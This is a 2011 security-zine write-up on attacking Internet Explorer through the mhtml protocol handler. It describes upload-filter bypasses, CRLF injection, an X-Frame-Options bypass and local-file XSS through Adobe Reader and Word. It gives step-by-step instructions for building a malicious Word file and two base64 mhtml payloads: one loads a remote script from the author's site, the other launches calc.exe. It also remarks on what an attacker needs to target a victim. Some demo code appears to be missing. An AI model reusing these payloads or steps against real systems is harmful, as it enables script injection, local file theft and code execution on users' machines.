Hacking with mhtml protocol handler Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2011/1/15 References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally released yesterday, There are two articles about the browser security[0x05 and 0x06].If the combination of both, we can complete a lot of interesting attacks... 1.Cross Site Scripting by upload mhtml file Using the mhtml protocol handler,The file extension is ignored.so the attacker use renname the mhtml file to a *.jpg file,etc. then upload it to the target site... ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file format security restrictions then use iframe tag src to it: 2.Cross Site Scripting mhtml-file string injection the mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked. poc: test it on win7 system pls. if win-xp or win2k3 system,pls do it by the second urlencode. mhtml-file string injection in JOSN file, some sites restrict the JOSN file's Content-Type to defense xss. maybe we can use mhtml-file string injection to pass it :) 3.bypass X-Frame-Options X-Frame-Options did not protect the mhtml protocol handler. the demo: 4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul Billy (BK) Rios introduced a very interesting approach to Steal local files on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/) ,it used "Script src to local files in the LocalLow directory" by file:// +java apple +Adobe Reader+Adobe flash to complete it. but if used mhtml+file://uncpath, so easy to do it. Demo: test it on win2k3+ie8+Adobe Reader 9 http://www.80vul.com/hackgame/xs-g0.php?username=Administrator 5.mhtml+file://uncpath+word == local xss vul demo:http://www.80vul.com/mhtml/word.doc download it, and save it on c:\word.doc and open it. u can get the alert c:\boot.ini 's content. this is base on "Microsoft word javascript execution"(http://marc.info/?l=bugtraq&m=121121432823704&w=2). to make the proof of concept follow the following steps: 1-Make a html file and paste xss code 2-Open the html file with the word and save as c:\word.xml 3-Open the word.xml with the notepad,and inject the mhtml code in aaaaa 4-Rename c:\word.xml to c:\word.doc 5-Open c:\word.doc file xss code --------------------------------------------------------- aaaaa ---------------------------------------------------------- mhtml code -------------------------------------------------------- /* Content-Type: multipart/related; boundary="_boundary_by_mere": --_boundary_by_mere Content-Location:cookie Content-Transfer-Encoding:base64 PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K --_boundary_by_mere-- */ -------------------------------------------------------- if u use this vul to attack someone,u need to known the word file path where save the download file. and lots of guns used on the desktop :) "Microsoft word javascript execution" is only work on office 2k3 and 2k7, In other versions u can make the link, and src to http://www.80vul.com/hackgame/word.htm update ofcouse ,this way maybe work on anoher file type like:*.pdf by app.launchURL() 6. Coss Zone Scripting First we would like to mention a very old vulnerability: This vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program on "My Computer" zone,Been tested and found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3 Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change: xss code --------------------------------------------------------- aaaaa ---------------------------------------------------------- mhtml code -------------------------------------------------------- /* Content-Type: multipart/related; boundary="_boundary_by_mere": --_boundary_by_mere Content-Location:cookie Content-Transfer-Encoding:base64 PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg== --_boundary_by_mere-- */ -------------------------------------------------------- thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper. About Ph4nt0m Webzine Ph4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions . mailto:root_at_ph4nt0m.org pls.thank you!